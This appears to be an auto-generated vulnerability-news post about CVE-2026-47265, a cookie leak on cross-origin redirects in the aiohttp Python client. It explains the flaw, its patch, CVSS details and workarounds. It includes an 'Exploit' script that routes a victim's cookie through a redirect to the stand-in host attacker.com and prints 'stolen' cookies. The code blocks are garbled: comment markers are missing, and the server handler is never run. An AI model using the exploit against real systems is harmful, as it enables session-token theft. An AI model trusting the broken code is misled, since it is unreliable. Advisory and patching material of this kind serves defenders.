Listen to this Post
CVE-2026-47265 is a moderate‑severity information disclosure vulnerability in the AIOHTTP client library for Python. It affects all versions prior to 3.14.0 and stems from how the library handles per‑request cookies when following cross‑origin HTTP redirects.
When an AIOHTTP client sends a request, it can include a `cookies` dictionary for that single request. This is distinct from session‑level cookies. The vulnerable behavior occurs if the server responds with a redirect (3xx) that points to a different origin. In affected versions, the client re‑attaches the per‑request cookies to the redirected request, even though the target origin is different from the original one.
This violates the same‑origin security principle. An attacker who can control the redirect target can therefore receive the cookies that were intended only for the original service. The issue is rooted in the client’s redirect logic: the code does not clear the per‑request cookies when the origin changes. The fix ensures that when a redirect leads to a different origin, the per‑request cookies are dropped before the new request is built.
The vulnerability is exploitable over the network and requires no authentication or user interaction. The CVSSv4 base score is 6.6 (Medium). The NVD classifies it under CWE‑346 (Origin Validation Error). The patch was merged in commit f54c408, which introduced a conditional assignment `cookies = None` when the redirect origin differs from the original request origin. The issue is fixed in AIOHTTP version 3.14.0.
Developers who use the `cookies` parameter on a per‑request basis should upgrade immediately. As a workaround, passing cookies inside the `headers` dictionary (as a `Cookie` header) is safe because those headers are correctly stripped on cross‑origin redirects.
DailyCVE Form:
Platform: AIOHTTP (Python)
Version: < 3.14.0
Vulnerability: CWE-346 Origin Validation
Severity: Moderate (CVSS 6.6)
date: 2026-06-02
Prediction: 3.14.0 (2026-06-02)
What Undercode Say:
Check installed aiohttp version pip show aiohttp | grep Version Scan project for dangerous pattern (per‑request cookies) grep -r "cookies=" --include=".py" . Search for cross‑origin redirect usage grep -r "allow_redirects=True" --include=".py" .
Vulnerable code example
async with session.get(url, cookies={"session": secret}, allow_redirects=True) as resp:
Cookies are leaked if attacker controls redirect
pass
Exploit:
!/usr/bin/env python3
import aiohttp
import asyncio
from aiohttp import web
async def malicious_redirect(request):
Attacker‑controlled redirect that steals cookies
print(f"Stolen cookies: {request.cookies}")
return web.Response(text="Cookie stolen")
async def vulnerable_client():
async with aiohttp.ClientSession() as session:
Victim sends request with per‑request cookie
async with session.get("http://trusted.site/redirect?to=http://attacker.com",
cookies={"admin": "true"}, allow_redirects=True) as resp:
print(await resp.text())
asyncio.run(vulnerable_client())
Protection:
Upgrade to fixed version
pip install --upgrade aiohttp>=3.14.0
Alternatively, use header instead of cookies
async with session.get(url, headers={"Cookie": "name=value"}) as resp:
Safe from redirect leak
pass
Disable automatic redirects if not required
async with session.get(url, allow_redirects=False) as resp:
pass
Impact:
- Information Disclosure: An attacker controlling a redirect endpoint can receive per‑request cookies intended for a different origin, potentially exposing session tokens or credentials.
- Confidentiality Breach: The CVSSv4 vector (
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U) highlights high confidentiality impact with no privilege or user interaction required. - Widespread Exposure: All AIOHTTP versions prior to 3.14.0 are affected; applications using per‑request cookies are at risk. The fix in 3.14.0 drops these cookies on cross‑origin redirects.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
